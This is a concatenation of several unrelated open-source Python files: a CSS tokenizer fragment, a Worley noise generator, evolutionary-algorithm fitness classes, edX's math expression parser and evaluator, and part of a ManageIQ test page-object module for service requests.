The type of token as a string. One of ``{``, ``(``, ``[`` or
``FUNCTION``. For ``FUNCTION``, the object is actually a
:class:`FunctionToken`.
.. attribute:: unit
Always ``None``. Included to make :class:`ContainerToken` behave
more like :class:`Token`.
.. attribute:: content
A list of :class:`Token` or nested :class:`ContainerToken`,
not including the opening or closing token.
.. attribute:: line
The line number in the CSS source of the start of this token.
.. attribute:: column
The column number (inside a source line) of the start of this token.
"""
is_container = True
unit = None
__slots__ = 'type', '_css_start', '_css_end', 'content', 'line', 'column'
def __init__(self, type_, css_start, css_end, content, line, column):
self.type = type_
self._css_start = css_start
self._css_end = css_end
self.content = content
self.line = line
self.column = column
def as_css(self):
"""
Return as an Unicode string the CSS representation of the token,
as parsed in the source.
"""
parts = [self._css_start]
parts.extend(token.as_css() for token in self.content)
parts.append(self._css_end)
return ''.join(parts)
format_string = '<ContainerToken {0.type} at {0.line}:{0.column}>'
def __repr__(self):
return (self.format_string + ' {0.content}').format(self)
class FunctionToken(ContainerToken):
"""A specialized :class:`ContainerToken` for a ``FUNCTION`` group.
Has an additional attribute:
.. attribute:: function_name
The unescaped name of the function, with the ``(`` marker removed.
"""
__slots__ = 'function_name',
def __init__(self, type_, css_start, css_end, function_name, content,
line, column):
super(FunctionToken, self).__init__(
type_, css_start, css_end, content, line, column)
# Remove the ( marker:
self.function_name = function_name[:-1]
format_string = ('<FunctionToken {0.function_name}() at '
'{0.line}:{0.column}>')
class TokenList(list):
"""
A mixed list of :class:`~.token_data.Token` and
:class:`~.token_data.ContainerToken` objects.
This is a subclass of the builtin :class:`~builtins.list` type.
It can be iterated, indexed and sliced as usual, but also has some
additional API:
"""
@property
def line(self):
"""The line number in the CSS source of the first token."""
return self[0].line
@property
def column(self):
"""The column number (inside a source line) of the first token."""
return self[0].column
def as_css(self):
"""
Return as an Unicode string the CSS representation of the tokens,
as parsed in the source.
"""
return ''.join(token.as_css() for token in self)
def load_c_tokenizer():
from calibre.constants import plugins
tokenizer, err = plugins['tokenizer']
if err:
raise RuntimeError('Failed to load module tokenizer: %s' % err)
tokens = list(':;(){}[]') + ['DELIM', 'INTEGER', 'STRING']
tokenizer.init(COMPILED_TOKEN_REGEXPS, UNICODE_UNESCAPE, NEWLINE_UNESCAPE, SIMPLE_UNESCAPE, FIND_NEWLINES, TOKEN_DISPATCH, COMPILED_TOKEN_INDEXES, *tokens)
return tokenizer
| gpl-3.0 |
yohei-washizaki/perlin | worley_noise.py | 1 | 1680 | #!/usr/bin/env python3
import math
def calc_sqr_distance(a, b):
vx = a[0] - b[0]
vy = a[1] - b[1]
return vx * vx + vy * vy
def find_nearest_distance(uv, max_size, random_points):
xf, xi = math.modf(uv[0])
yf, yi = math.modf(uv[1])
min_sqr_distance = float("inf")
for y_offset in [-1, 0, 1]:
for x_offset in [-1, 0, 1]:
x = int((xi + x_offset + max_size) % max_size)
y = int((yi + y_offset + max_size) % max_size)
idx = int(x * max_size + y)
p = random_points[idx]
other = (x_offset + xi + p[0],
y_offset + yi + p[1])
sqr_distance = calc_sqr_distance(uv, other)
if sqr_distance < min_sqr_distance:
min_sqr_distance = sqr_distance
return math.sqrt(min_sqr_distance)
if __name__ == "__main__":
import argparse
import random
from random_point import gen_random_points
from uv import gen_uv
parser = argparse.ArgumentParser()
parser.add_argument("size", type=int, help="size of a texture. power of 2")
parser.add_argument("-r", "--random_seed", type=int, help="random seed")
parser.add_argument("-s", "--scale_factor", type=float, default=1.0, help="scale factor")
args = parser.parse_args()
scale_factor = args.scale_factor
random.seed(args.random_seed)
random_points = gen_random_points(int(scale_factor*scale_factor), 1.0, random)
uvs = gen_uv(args.size, args.size, scale_factor)
for uv in uvs:
nearest_distance = find_nearest_distance(uv, scale_factor, random_points)
print(nearest_distance)
| mit |
sondree/Master-thesis | Python EA/ea/fitness.py | 1 | 7716 | #!/usr/bin/python
from config import GLOBAL_SECTION
from utility import select_class, degToRad
FITNESS_SECTION = 'Fitness'
from math import pi,log, sqrt
def parse_config(config):
classes = [('HeurFitness', HeurFitness),('GPUFitness', GPUFitness),('ProjectFitness', ProjectFitness),('DummyFitness',DummyFitness)]
clazz = config.get(FITNESS_SECTION, 'class')
c = select_class(clazz, classes)
if c != None:
return c(config)
else:
raise NameError("Could not find the fitness class: {0}".format(clazz))
class DummyFitness(object):
def __init__(self,configuration):
pass
def calc_fitness(self,population):
for i in population:
t = (100.0*100.0-float(i.get_value()**2))/(100.0*100.0)
i.set_fitness(t)
return population
class BasicFitness(object):
def __init__(self, config):
self.grid = self.__parse_grid(config)
self.step_size = self.__parse_step_size(config)
self.num_trials = self.__parse_num_trials(config)
self.seed = self.__parse_seed(config)
self.noise_stddev = self.__parse_noise(config)
self.emitter_position = self.__parse_emitter_position(config)
def __parse_noise(self,config):
b = config.getfloat(FITNESS_SECTION, 'noise_stddev')
return b
def __parse_emitter_position(self,config):
x = config.getfloat(FITNESS_SECTION, 'emitter_pos_x')
y = config.getfloat(FITNESS_SECTION, 'emitter_pos_y')
return (x,y)
def __parse_grid(self, config):
x = config.getint(FITNESS_SECTION, 'grid_x')
y = config.getint(FITNESS_SECTION, 'grid_y')
return (x, y)
def __parse_step_size(self, config):
return config.getint(FITNESS_SECTION, 'step_size')
def __parse_num_trials(self, config):
return config.getint(FITNESS_SECTION, 'num_trials')
def __parse_seed(self, config):
return config.getint(GLOBAL_SECTION, 'seed')
class GPUFitness(BasicFitness):
def __init__(self,config):
super(GPUFitness,self).__init__(config)
self.mode = self.__parse_mode(config)
def __parse_mode(self,config):
mode = config.getint(FITNESS_SECTION, "mode")
return mode
def calc_gpu(self, receiver_positions):
from nllsCuda import pyMultipleFitness
#def pyFitness(receiverPositions, emitterPosition, numTrials, noiseStdDev, numSteps, gridMax):
vals = pyMultipleFitness(receiver_positions,self.emitter_position, self.num_trials,self.noise_stddev, self.step_size, self.grid)
return vals
def calc_fitness(self, population):
vals = self.calc_gpu(map(lambda pheno: pheno.get_position(), population))
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
population[i].set_statistics(avg_dev, max_dev, min_dev, variance, abs_bias)
if self.mode == 0:
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
population[i].set_fitness(100.0/(1.0+avg_dev))
elif self.mode == 1:
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
population[i].set_fitness(100.0/(1.0+fit*0.0001))
return population
class ProjectFitness(GPUFitness):
def __init__(self,config):
super(ProjectFitness,self).__init__(config)
self.rotate_degrees = self.__parse_rotate(config)
def __parse_rotate(self, config):
try:
return config.getint(FITNESS_SECTION, 'rotate_step_degrees')
except:
return None
def calc_fitness(self, population):
results = [0] * len(population)
num_steps = int(360/self.rotate_degrees)
assert num_steps * self.rotate_degrees == 360, "Rotation degrees should make an even rotation"
rotate_radians = degToRad(self.rotate_degrees)
for step in range(num_steps):
map(lambda pheno: pheno.rotate(rotate_radians*step), population.get_phenos())
vals = self.calc_gpu(map(lambda pheno: pheno.get_position(), population))
for x in range(len(population)):
results[x] += vals[x][0]
norm_value = 950*num_steps #sqrt(self.grid[0]**2 +self.grid[1]**2)*num_steps
for i, val in enumerate(results):
#fit = 100.0*(1-(val/norm_value))
fit = 100.0/(1.0+val*0.0001)
#print val, norm_value, fit
population[i].set_fitness(fit)
return population
class HeurFitness(BasicFitness):
def __init__(self,config):
super(HeurFitness,self).__init__(config)
self.base_position = self.__parse_base_position(config)
self.num_simulations = self.__parse_num_simulations(config)
self.num_receivers = self.__parse_num_receivers(config)
def __parse_base_position(self,config):
x = config.getint(FITNESS_SECTION, "base_pos_x")
y = config.getint(FITNESS_SECTION, "base_pos_y")
return (x,y)
def __parse_num_simulations(self,config):
n = config.getint(FITNESS_SECTION, "num_simulations")
return n
def __parse_num_receivers(self,config):
n = config.getint(GLOBAL_SECTION, "num_receivers")
return n
def make_uav_positions(self, num_receivers, base_position, angles):
from fitness_heuristics import make_receiver
from utility import degToRad
uavPositions = []
for i, angle in enumerate(angles):
rads = degToRad(angle)
uavPositions.append(make_receiver(self.base_position,rads,50))
return uavPositions
def calc_gpu(self, receiver_positions):
from nllsCuda import pyMultipleFitness
#def pyFitness(receiverPositions, emitterPosition, numTrials, noiseStdDev, numSteps, gridMax):
vals = pyMultipleFitness(receiver_positions,self.emitter_position, 100,self.noise_stddev, self.step_size, self.grid)
return vals
def calc_fitness(self,population):
from fitness_heuristics import simulate
from heuristics.AttractionAgent import AttractionAgent
from random import getstate, setstate
import numpy as np
state = getstate()
for i,individ in enumerate(population):
heuristics_params = individ.get_heur_params()
uav_positions = self.make_uav_positions(self.num_receivers,self.base_position, heuristics_params[1:])
position_sets = []
steps = []
for t in xrange(self.num_simulations):
setstate(state)
samplesUsed, samplePositions = simulate(self.num_trials, self.grid, self.emitter_position, self.noise_stddev, uav_positions, AttractionAgent, heuristics_params, 8)
position_sets.append(samplePositions)
steps.append(samplesUsed)
vals = self.calc_gpu(position_sets)
fits = []
for i, (fit, avg_dev, max_dev, min_dev, variance, abs_bias) in enumerate(vals):
fits.append(fit)
fits = np.array(fits)
fit_avg = fits.sum()/len(fits)
steps = np.array(steps)
steps_avg = steps.sum()/len(steps)
individ.set_fitness(100.0/(1.0+fit_avg*0.0001))
print heuristics_params, fit_avg, steps_avg, 100.0/(1.0+fit_avg*0.0001)
return population
| gpl-3.0 |
xiandiancloud/edx-platform | common/lib/calc/calc/calc.py | 61 | 13558 | """
Parser and evaluator for FormulaResponse and NumericalResponse
Uses pyparsing to parse. Main function as of now is evaluator().
"""
import math
import operator
import numbers
import numpy
import scipy.constants
import functions
from pyparsing import (
Word, Literal, CaselessLiteral, ZeroOrMore, MatchFirst, Optional, Forward,
Group, ParseResults, stringEnd, Suppress, Combine, alphas, nums, alphanums
)
DEFAULT_FUNCTIONS = {
'sin': numpy.sin,
'cos': numpy.cos,
'tan': numpy.tan,
'sec': functions.sec,
'csc': functions.csc,
'cot': functions.cot,
'sqrt': numpy.sqrt,
'log10': numpy.log10,
'log2': numpy.log2,
'ln': numpy.log,
'exp': numpy.exp,
'arccos': numpy.arccos,
'arcsin': numpy.arcsin,
'arctan': numpy.arctan,
'arcsec': functions.arcsec,
'arccsc': functions.arccsc,
'arccot': functions.arccot,
'abs': numpy.abs,
'fact': math.factorial,
'factorial': math.factorial,
'sinh': numpy.sinh,
'cosh': numpy.cosh,
'tanh': numpy.tanh,
'sech': functions.sech,
'csch': functions.csch,
'coth': functions.coth,
'arcsinh': numpy.arcsinh,
'arccosh': numpy.arccosh,
'arctanh': numpy.arctanh,
'arcsech': functions.arcsech,
'arccsch': functions.arccsch,
'arccoth': functions.arccoth
}
DEFAULT_VARIABLES = {
'i': numpy.complex(0, 1),
'j': numpy.complex(0, 1),
'e': numpy.e,
'pi': numpy.pi,
'k': scipy.constants.k, # Boltzmann: 1.3806488e-23 (Joules/Kelvin)
'c': scipy.constants.c, # Light Speed: 2.998e8 (m/s)
'T': 298.15, # Typical room temperature: 298.15 (Kelvin), same as 25C/77F
'q': scipy.constants.e # Fund. Charge: 1.602176565e-19 (Coulombs)
}
# We eliminated the following extreme suffixes:
# P (1e15), E (1e18), Z (1e21), Y (1e24),
# f (1e-15), a (1e-18), z (1e-21), y (1e-24)
# since they're rarely used, and potentially confusing.
# They may also conflict with variables if we ever allow e.g.
# 5R instead of 5*R
SUFFIXES = {
'%': 0.01, 'k': 1e3, 'M': 1e6, 'G': 1e9, 'T': 1e12,
'c': 1e-2, 'm': 1e-3, 'u': 1e-6, 'n': 1e-9, 'p': 1e-12
}
class UndefinedVariable(Exception):
"""
Indicate when a student inputs a variable which was not expected.
"""
pass
def lower_dict(input_dict):
"""
Convert all keys in a dictionary to lowercase; keep their original values.
Keep in mind that it is possible (but not useful?) to define different
variables that have the same lowercase representation. It would be hard to
tell which is used in the final dict and which isn't.
"""
return {k.lower(): v for k, v in input_dict.iteritems()}
# The following few functions define evaluation actions, which are run on lists
# of results from each parse component. They convert the strings and (previously
# calculated) numbers into the number that component represents.
def super_float(text):
"""
Like float, but with SI extensions. 1k goes to 1000.
"""
if text[-1] in SUFFIXES:
return float(text[:-1]) * SUFFIXES[text[-1]]
else:
return float(text)
def eval_number(parse_result):
"""
Create a float out of its string parts.
e.g. [ '7.13', 'e', '3' ] -> 7130
Calls super_float above.
"""
return super_float("".join(parse_result))
def eval_atom(parse_result):
"""
Return the value wrapped by the atom.
In the case of parenthesis, ignore them.
"""
# Find first number in the list
result = next(k for k in parse_result if isinstance(k, numbers.Number))
return result
def eval_power(parse_result):
"""
Take a list of numbers and exponentiate them, right to left.
e.g. [ 2, 3, 2 ] -> 2^3^2 = 2^(3^2) -> 512
(not to be interpreted (2^3)^2 = 64)
"""
# `reduce` will go from left to right; reverse the list.
parse_result = reversed(
[k for k in parse_result
if isinstance(k, numbers.Number)] # Ignore the '^' marks.
)
# Having reversed it, raise `b` to the power of `a`.
power = reduce(lambda a, b: b ** a, parse_result)
return power
def eval_parallel(parse_result):
"""
Compute numbers according to the parallel resistors operator.
BTW it is commutative. Its formula is given by
out = 1 / (1/in1 + 1/in2 + ...)
e.g. [ 1, 2 ] -> 2/3
Return NaN if there is a zero among the inputs.
"""
if len(parse_result) == 1:
return parse_result[0]
if 0 in parse_result:
return float('nan')
reciprocals = [1. / e for e in parse_result
if isinstance(e, numbers.Number)]
return 1. / sum(reciprocals)
def eval_sum(parse_result):
"""
Add the inputs, keeping in mind their sign.
[ 1, '+', 2, '-', 3 ] -> 0
Allow a leading + or -.
"""
total = 0.0
current_op = operator.add
for token in parse_result:
if token == '+':
current_op = operator.add
elif token == '-':
current_op = operator.sub
else:
total = current_op(total, token)
return total
def eval_product(parse_result):
"""
Multiply the inputs.
[ 1, '*', 2, '/', 3 ] -> 0.66
"""
prod = 1.0
current_op = operator.mul
for token in parse_result:
if token == '*':
current_op = operator.mul
elif token == '/':
current_op = operator.truediv
else:
prod = current_op(prod, token)
return prod
def add_defaults(variables, functions, case_sensitive):
"""
Create dictionaries with both the default and user-defined variables.
"""
all_variables = dict(DEFAULT_VARIABLES)
all_functions = dict(DEFAULT_FUNCTIONS)
all_variables.update(variables)
all_functions.update(functions)
if not case_sensitive:
all_variables = lower_dict(all_variables)
all_functions = lower_dict(all_functions)
return (all_variables, all_functions)
def evaluator(variables, functions, math_expr, case_sensitive=False):
"""
Evaluate an expression; that is, take a string of math and return a float.
-Variables are passed as a dictionary from string to value. They must be
python numbers.
-Unary functions are passed as a dictionary from string to function.
"""
# No need to go further.
if math_expr.strip() == "":
return float('nan')
# Parse the tree.
math_interpreter = ParseAugmenter(math_expr, case_sensitive)
math_interpreter.parse_algebra()
# Get our variables together.
all_variables, all_functions = add_defaults(variables, functions, case_sensitive)
# ...and check them
math_interpreter.check_variables(all_variables, all_functions)
# Create a recursion to evaluate the tree.
if case_sensitive:
casify = lambda x: x
else:
casify = lambda x: x.lower() # Lowercase for case insens.
evaluate_actions = {
'number': eval_number,
'variable': lambda x: all_variables[casify(x[0])],
'function': lambda x: all_functions[casify(x[0])](x[1]),
'atom': eval_atom,
'power': eval_power,
'parallel': eval_parallel,
'product': eval_product,
'sum': eval_sum
}
return math_interpreter.reduce_tree(evaluate_actions)
class ParseAugmenter(object):
"""
Holds the data for a particular parse.
Retains the `math_expr` and `case_sensitive` so they needn't be passed
around method to method.
Eventually holds the parse tree and sets of variables as well.
"""
def __init__(self, math_expr, case_sensitive=False):
"""
Create the ParseAugmenter for a given math expression string.
Do the parsing later, when called like `OBJ.parse_algebra()`.
"""
self.case_sensitive = case_sensitive
self.math_expr = math_expr
self.tree = None
self.variables_used = set()
self.functions_used = set()
def vpa(tokens):
"""
When a variable is recognized, store it in `variables_used`.
"""
varname = tokens[0][0]
self.variables_used.add(varname)
def fpa(tokens):
"""
When a function is recognized, store it in `functions_used`.
"""
varname = tokens[0][0]
self.functions_used.add(varname)
self.variable_parse_action = vpa
self.function_parse_action = fpa
def parse_algebra(self):
"""
Parse an algebraic expression into a tree.
Store a `pyparsing.ParseResult` in `self.tree` with proper groupings to
reflect parenthesis and order of operations. Leave all operators in the
tree and do not parse any strings of numbers into their float versions.
Adding the groups and result names makes the `repr()` of the result
really gross. For debugging, use something like
print OBJ.tree.asXML()
"""
# 0.33 or 7 or .34 or 16.
number_part = Word(nums)
inner_number = (number_part + Optional("." + Optional(number_part))) | ("." + number_part)
# pyparsing allows spaces between tokens--`Combine` prevents that.
inner_number = Combine(inner_number)
# SI suffixes and percent.
number_suffix = MatchFirst(Literal(k) for k in SUFFIXES.keys())
# 0.33k or 17
plus_minus = Literal('+') | Literal('-')
number = Group(
Optional(plus_minus) +
inner_number +
Optional(CaselessLiteral("E") + Optional(plus_minus) + number_part) +
Optional(number_suffix)
)
number = number("number")
# Predefine recursive variables.
expr = Forward()
# Handle variables passed in. They must start with letters/underscores
# and may contain numbers afterward.
inner_varname = Word(alphas + "_", alphanums + "_")
varname = Group(inner_varname)("variable")
varname.setParseAction(self.variable_parse_action)
# Same thing for functions.
function = Group(inner_varname + Suppress("(") + expr + Suppress(")"))("function")
function.setParseAction(self.function_parse_action)
atom = number | function | varname | "(" + expr + ")"
atom = Group(atom)("atom")
# Do the following in the correct order to preserve order of operation.
pow_term = atom + ZeroOrMore("^" + atom)
pow_term = Group(pow_term)("power")
par_term = pow_term + ZeroOrMore('||' + pow_term) # 5k || 4k
par_term = Group(par_term)("parallel")
prod_term = par_term + ZeroOrMore((Literal('*') | Literal('/')) + par_term) # 7 * 5 / 4
prod_term = Group(prod_term)("product")
sum_term = Optional(plus_minus) + prod_term + ZeroOrMore(plus_minus + prod_term) # -5 + 4 - 3
sum_term = Group(sum_term)("sum")
# Finish the recursion.
expr << sum_term # pylint: disable=W0104
self.tree = (expr + stringEnd).parseString(self.math_expr)[0]
def reduce_tree(self, handle_actions, terminal_converter=None):
"""
Call `handle_actions` recursively on `self.tree` and return result.
`handle_actions` is a dictionary of node names (e.g. 'product', 'sum',
etc&) to functions. These functions are of the following form:
-input: a list of processed child nodes. If it includes any terminal
nodes in the list, they will be given as their processed forms also.
-output: whatever to be passed to the level higher, and what to
return for the final node.
`terminal_converter` is a function that takes in a token and returns a
processed form. The default of `None` just leaves them as strings.
"""
def handle_node(node):
"""
Return the result representing the node, using recursion.
Call the appropriate `handle_action` for this node. As its inputs,
feed it the output of `handle_node` for each child node.
"""
if not isinstance(node, ParseResults):
# Then treat it as a terminal node.
if terminal_converter is None:
return node
else:
return terminal_converter(node)
node_name = node.getName()
if node_name not in handle_actions: # pragma: no cover
raise Exception(u"Unknown branch name '{}'".format(node_name))
action = handle_actions[node_name]
handled_kids = [handle_node(k) for k in node]
return action(handled_kids)
# Find the value of the entire tree.
return handle_node(self.tree)
def check_variables(self, valid_variables, valid_functions):
"""
Confirm that all the variables used in the tree are valid/defined.
Otherwise, raise an UndefinedVariable containing all bad variables.
"""
if self.case_sensitive:
casify = lambda x: x
else:
casify = lambda x: x.lower() # Lowercase for case insens.
# Test if casify(X) is valid, but return the actual bad input (i.e. X)
bad_vars = set(var for var in self.variables_used
if casify(var) not in valid_variables)
bad_vars.update(func for func in self.functions_used
if casify(func) not in valid_functions)
if bad_vars:
raise UndefinedVariable(' '.join(sorted(bad_vars)))
| agpl-3.0 |
izapolsk/integration_tests | cfme/services/requests.py | 1 | 21136 | from copy import copy
import attr
from navmazing import NavigateToAttribute
from navmazing import NavigateToSibling
from widgetastic.widget import Checkbox
from widgetastic.widget import Table
from widgetastic.widget import Text
from widgetastic.widget import View
from widgetastic_patternfly import BootstrapTreeview
from widgetastic_patternfly import BreadCrumb
from widgetastic_patternfly import Input
from cfme.common import BaseLoggedInPage
from cfme.common.vm_views import BasicProvisionFormView
from cfme.common.vm_views import ProvisionView
from cfme.exceptions import displayed_not_implemented
from cfme.exceptions import ItemNotFound
from cfme.exceptions import RequestException
from cfme.modeling.base import BaseCollection
from cfme.modeling.base import BaseEntity
from cfme.utils.appliance.implementations.ui import CFMENavigateStep
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.appliance.implementations.ui import navigator
from cfme.utils.log import logger
from cfme.utils.varmeth import variable
from cfme.utils.wait import wait_for
from widgetastic_manageiq import Button
from widgetastic_manageiq import PaginationPane
from widgetastic_manageiq import SummaryForm
from widgetastic_manageiq import SummaryFormItem
from widgetastic_manageiq import WaitTab
@attr.s
class Request(BaseEntity):
"""
Class describes request row from Services - Requests page
"""
REQUEST_FINISHED_STATES = {'Migrated', 'Finished'}
description = attr.ib(default=None)
message = attr.ib(default=None)
partial_check = attr.ib(default=False)
cells = attr.ib(default=None)
row = attr.ib(default=None, init=False)
def __attrs_post_init__(self):
self.cells = self.cells or {'Description': self.description}
# TODO Replace varmeth with Sentaku one day
@variable(alias='rest')
def wait_for_request(self, num_sec=1800, delay=20):
def _finished():
self.rest.reload()
return (self.rest.request_state.title() in self.REQUEST_FINISHED_STATES and
'Retry' not in self.rest.message)
def last_message():
logger.info("Last Request message: '{}'".format(self.rest.message))
wait_for(_finished, num_sec=num_sec, delay=delay, fail_func=last_message,
message="Request finished")
@wait_for_request.variant('ui')
def wait_for_request_ui(self, num_sec=1200, delay=10):
def _finished():
self.update(method='ui')
return (self.row.request_state.text in self.REQUEST_FINISHED_STATES and
'Retry' not in self.row.last_message.text)
def last_message():
logger.info("Last Request message in UI: '{}'".format(self.row.last_message))
wait_for(_finished, num_sec=num_sec, delay=delay, fail_func=last_message,
message="Request finished")
@property
def rest(self):
if self.partial_check:
matching_requests = self.appliance.rest_api.collections.requests.find_by(
description='%{}%'.format(self.cells['Description']))
else:
matching_requests = self.appliance.rest_api.collections.requests.find_by(
description=self.cells['Description'])
if len(matching_requests) > 1:
raise RequestException(
'Multiple requests with matching \"{}\" '
'found - be more specific!'.format(
self.description))
elif len(matching_requests) == 0:
raise ItemNotFound(
'Nothing matching "{}" with partial_check={} was found'.format(
self.cells['Description'], self.partial_check))
else:
return matching_requests[0]
def get_request_row_from_ui(self):
"""Opens CFME UI and return table_row object"""
view = navigate_to(self.parent, 'All')
self.row = view.find_request(self.cells, partial_check=self.partial_check)
return self.row
def get_request_id(self):
return self.rest.request_id
@variable(alias='rest')
def exists(self):
"""If our Request exists in CFME"""
try:
return self.rest.exists
except ItemNotFound:
return False
@property
def status(self):
self.update()
return self.rest.status
@property
def request_state(self):
self.update()
return self.rest.request_state
@exists.variant('ui')
def exists_ui(self):
"""
Checks if Request if shown in CFME UI.
Request might be removed from CFME UI but present in DB
"""
view = navigate_to(self.parent, 'All')
return bool(view.find_request(self.cells, self.partial_check))
@variable(alias='rest')
def update(self):
"""Updates Request object details - last message, status etc
"""
self.rest.reload()
self.description = self.rest.description
self.message = self.rest.message
self.cells = {'Description': self.description}
@update.variant('ui')
def update_ui(self):
view = navigate_to(self.parent, 'All')
view.toolbar.reload.click()
self.row = view.find_request(cells=self.cells, partial_check=self.partial_check)
@variable(alias='rest')
def approve_request(self, reason):
"""Approves request with specified reason
Args:
reason: Reason for approving the request.
cancel: Whether to cancel the approval.
"""
self.rest.action.approve(reason=reason)
@approve_request.variant('ui')
def approve_request_ui(self, reason, cancel=False):
view = navigate_to(self, 'Approve')
view.reason.fill(reason)
if not cancel:
view.submit.click()
else:
view.breadcrumb.click_location(view.breadcrumb.locations[1], handle_alert=True)
view.flash.assert_no_error()
@variable(alias='rest')
def deny_request(self, reason):
"""Opens the specified request and deny it.
Args:
reason: Reason for denying the request.
cancel: Whether to cancel the denial.
"""
self.rest.action.deny(reason=reason)
@deny_request.variant('ui')
def deny_request_ui(self, reason, cancel=False):
view = navigate_to(self, 'Deny')
view.reason.fill(reason)
if not cancel:
view.submit.click()
else:
view.breadcrumb.click_location(view.breadcrumb.locations[1], handle_alert=True)
view.flash.assert_no_error()
@variable
def remove_request(self, cancel=False):
"""Opens the specified request and deletes it - removes from UI
Args:
cancel: Whether to cancel the deletion.
"""
if self.exists(method="ui"):
view = navigate_to(self, 'Details')
view.toolbar.delete.click(handle_alert=not cancel)
@remove_request.variant("rest")
def remove_request_rest(self):
if "service" in self.rest.request_type:
request = self.appliance.rest_api.collections.service_requests.find_by(id=self.rest.id)
request[0].action.delete()
else:
raise NotImplementedError(
"{} does not support delete operation via REST".format(self.rest.request_type)
)
@variable(alias='rest')
def is_finished(self):
"""Helper function checks if a request is completed
"""
self.update()
return self.rest.request_state.title() in self.REQUEST_FINISHED_STATES
@is_finished.variant('ui')
def is_finished_ui(self):
self.update(method='ui')
return self.row.request_state.text in self.REQUEST_FINISHED_STATES
@variable(alias='rest')
def is_succeeded(self):
return self.is_finished() and self.rest.status.title() == 'Ok'
@is_succeeded.variant('ui')
def is_succeeded_ui(self):
return self.is_finished(method='ui') and self.row.status.text == 'Ok'
def copy_request(self, values=None, cancel=False):
"""Copies the request and edits if needed
"""
view = navigate_to(self, 'Copy')
view.form.fill(values)
if not cancel:
view.form.submit_button.click()
else:
view.cancel_button.click()
view.flash.assert_no_error()
# The way we identify request is a description which is based on vm_name,
# no need returning Request obj if name is the same => raw request copy
if 'catalog' in values and 'vm_name' in values['catalog']:
return Request(self.parent, description=values['catalog']['vm_name'],
partial_check=True)
def edit_request(self, values, cancel=False):
"""Opens the request for editing and saves or cancels depending on success.
"""
view = navigate_to(self, 'Edit')
if view.form.fill(values):
if not cancel:
view.form.submit_button.click()
# TODO remove this hack for description update that anchors the request
if values.get('Description'):
self.description = values['Description']
self.cells.update({'Description': self.description})
self.update()
else:
view.cancel_button.click()
else:
logger.debug('Nothing was changed in current request')
view.flash.assert_no_error()
@attr.s
class RequestCollection(BaseCollection):
"""The appliance collection of requests"""
ENTITY = Request
class RequestsToolbar(View):
"""Toolbar on the requests view"""
reload = Button(title='Refresh this page')
class RequestBasicView(BaseLoggedInPage):
title = Text('//div[@id="main-content"]//h1')
toolbar = View.nested(RequestsToolbar)
@property
def in_requests(self):
return (
self.logged_in_as_current_user
and self.navigation.currently_selected == ['Services', 'Requests']
)
class RequestsView(RequestBasicView):
table = Table(locator='//div[@id="gtl_div"]//table')
paginator = PaginationPane()
def find_request(self, cells, partial_check=False):
"""Finds the request and returns the row element
Args:
cells: Search data for the requests table.
partial_check: If to use the ``__contains`` operator
Returns: row
"""
contains = '' if not partial_check else '__contains'
column_list = self.table.attributized_headers
cells = copy(cells)
for key in cells.keys():
for column_name, column_text in column_list.items():
if key == column_text:
cells['{}{}'.format(column_name, contains)] = cells.pop(key)
break
for _ in self.paginator.pages():
rows = list(self.table.rows(**cells))
if len(rows) == 0:
# row not on this page, assume it has yet to appear
# it might be nice to add an option to fail at this point
continue
elif len(rows) > 1:
raise RequestException('Multiple requests with matching content found - '
'be more specific!')
else:
# found the row!
row = rows[0]
logger.debug(' Request Message: %s', row.last_message.text)
return row
else:
raise Exception("The request specified by {} not found!".format(str(cells)))
@property
def is_displayed(self):
return self.in_requests and self.title.text == 'Requests'
class RequestDetailsToolBar(RequestsView):
copy = Button(title='Copy original Request')
edit = Button(title='Edit the original Request')
delete = Button(title='Delete this Request')
approve = Button(title='Approve this Request')
deny = Button(title='Deny this Request')
class RequestDetailsView(RequestsView):
@View.nested
class details(View): # noqa
request_details = SummaryForm('Request Details')
@View.nested
class request(WaitTab): # noqa
TAB_NAME = 'Request'
email = SummaryFormItem('Request Information', 'E-Mail')
first_name = SummaryFormItem('Request Information', 'First Name')
last_name = SummaryFormItem('Request Information', 'Last Name')
notes = SummaryFormItem('Request Information', 'Notes')
manager_name = SummaryFormItem('Manager', 'Name')
@View.nested
class purpose(WaitTab): # noqa
TAB_NAME = 'Purpose'
apply_tags = BootstrapTreeview('all_tags_treebox')
@View.nested
class catalog(WaitTab): # noqa
TAB_NAME = 'Catalog'
filter_template = SummaryFormItem('Select', 'Filter')
name = SummaryFormItem('Select', 'Name')
provision_type = SummaryFormItem('Select', 'Provision Type')
linked_clone = Checkbox(id='service__linked_clone')
vm_count = SummaryFormItem('Number of VMs', 'Count')
instance_count = SummaryFormItem('Number of Instances', 'Count')
vm_name = SummaryFormItem('Naming', 'VM Name')
instance_name = SummaryFormItem('Naming', 'Instance Name')
vm_description = SummaryFormItem('Naming', 'VM Description')
@View.nested
class environment(WaitTab): # noqa
TAB_NAME = 'Environment'
automatic_placement = Checkbox(name='environment__placement_auto')
# Azure
virtual_private_cloud = SummaryFormItem('Placement - Options', 'Virtual Private Cloud')
cloud_subnet = SummaryFormItem('Placement - Options', 'Cloud Subnet')
security_groups = SummaryFormItem('Placement - Options', 'Security Groups')
resource_groups = SummaryFormItem('Placement - Options', 'Resource Groups')
public_ip_address = SummaryFormItem('Placement - Options', 'Public IP Address ')
# GCE
availability_zone = SummaryFormItem('Placement - Options', 'Availability Zones')
cloud_network = SummaryFormItem('Placement - Options', 'Cloud Network')
# Infra
datacenter = SummaryFormItem('Datacenter', 'Name')
cluster = SummaryFormItem('Cluster', 'Name')
resource_pool = SummaryFormItem('Resource Pool', 'Name')
folder = SummaryFormItem('Folder', 'Name')
host_filter = SummaryFormItem('Host', 'Filter')
host_name = SummaryFormItem('Host', 'Name')
datastore_storage_profile = SummaryFormItem('Datastore', 'Storage Profile')
datastore_filter = SummaryFormItem('Datastore', 'Filter')
datastore_name = SummaryFormItem('Datastore', 'Name')
@View.nested
class hardware(WaitTab): # noqa
num_cpus = SummaryFormItem('Hardware', 'Number of CPUS')
memory = SummaryFormItem('Hardware', 'Startup Memory (MB)')
dynamic_memory = SummaryFormItem('Hardware', 'Dynamic Memory')
vm_limit_cpu = SummaryFormItem('VM Limits', 'CPU (%)')
vm_reserve_cpu = SummaryFormItem('VM Reservations', 'CPU (%)')
@View.nested
class network(WaitTab): # noqa
vlan = SummaryFormItem('Network Adapter Information', 'vLan')
@View.nested
